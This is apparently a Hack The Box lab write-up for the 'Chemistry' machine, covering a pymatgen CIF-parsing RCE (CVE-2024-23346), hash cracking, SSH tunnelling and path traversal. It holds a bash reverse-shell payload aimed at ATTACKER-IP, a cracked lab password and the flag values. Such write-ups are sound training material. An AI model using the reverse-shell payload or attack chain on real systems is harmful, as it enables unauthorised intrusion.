Hack The Box

Chemistry

HTBEasyLinuxRCEFile UploadPrivEsc

Summary

Chemistry is an Easy Linux machine running a Flask CIF Analyzer web app. The app parses uploaded CIF files with pymatgen, which is vulnerable to remote code execution (CVE-2024-23346), yielding a reverse shell. A local SQLite database exposes a password hash that, once cracked, grants SSH access as rosa. An internal AioHTTP service exposed on localhost is then abused via path traversal to read the root flag.

Machine Information

Name	Difficulty	OS	Platform
Chemistry	Easy	Linux	Hack The Box

Attack Path

Nmap reveals SSH and an HTTP service on port 5000.
The web application allows authenticated CIF file uploads.
A malicious CIF file exploits the pymatgen RCE (CVE-2024-23346).
A reverse shell is obtained on the server.
A local database file reveals a password hash.
The hash is cracked and reused for SSH access as rosa.
An internal service on localhost is reached through SSH tunneling.
A path traversal vulnerability is exploited to read the root flag.

Reconnaissance

Initial enumeration was performed with Nmap.

nmap -sC -sV -A 10.10.11.38

Nmap Scan

Port	Service
22	SSH
5000	HTTP (Python Flask)

The web application hosted a CIF Analyzer used to upload and analyze crystallographic files.

Web Enumeration

The application exposed a login and registration system. After registering an account, the dashboard allowed users to upload CIF files.

Upload feature

Exploitation — pymatgen RCE (CVE-2024-23346)

The application uses the pymatgen library to process CIF files. The library parses user input with eval(), allowing arbitrary code execution when a crafted CIF file is parsed.

A malicious CIF file was created with a reverse shell payload:

system("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1'")

After uploading the file and triggering the parser, a reverse shell was received.

Credential Discovery

Exploring the filesystem revealed a SQLite database containing stored credentials.

cat database.db

Database hash

The extracted hash was cracked offline:

Cracked hash

rosa : unicorniosrosados

Initial Access

The recovered credentials were reused to authenticate over SSH as rosa.

ssh rosa@10.10.11.38

This provided the initial foothold on the system.

Privilege Escalation

Enumeration

Listing listening sockets revealed an internal service on localhost:8080.

netstat -nltp

Internal service

An SSH tunnel was used to reach the service from the attacker machine.

ssh -L 8888:127.0.0.1:8080 rosa@10.10.11.38

Path Traversal (AioHTTP)

The internal application (running as root) was vulnerable to path traversal, allowing arbitrary file reads. This was abused to read the root flag directly.

Flags

User

cat /home/rosa/user.txt

584e2c0f8f541ed3cd0668cbac6fb292

Root

# via the path traversal on the internal service

f4cad6dda7ee09c56b082148357d58db

Vulnerabilities Identified

Remote Code Execution — pymatgen (CVE-2024-23346)

The app used pymatgen to parse uploaded CIF files.
The library processed input with eval(), enabling arbitrary code execution.

Impact: remote code execution and an initial foothold on the server.

Path Traversal — AioHTTP

An internal web application allowed directory traversal.

Impact: arbitrary file read, including sensitive system files and the root flag.

Tools Used

Nmap
Netcat
SSH
Hash cracking tools
Burp Suite

Key Takeaways

File upload features that parse complex formats can hide RCE in their parsing libraries.
Insecure use of eval() in dependencies is a recurring, high-impact bug.
Local databases often store crackable credential hashes.
Internal services bound to localhost are still reachable after a foothold via tunneling.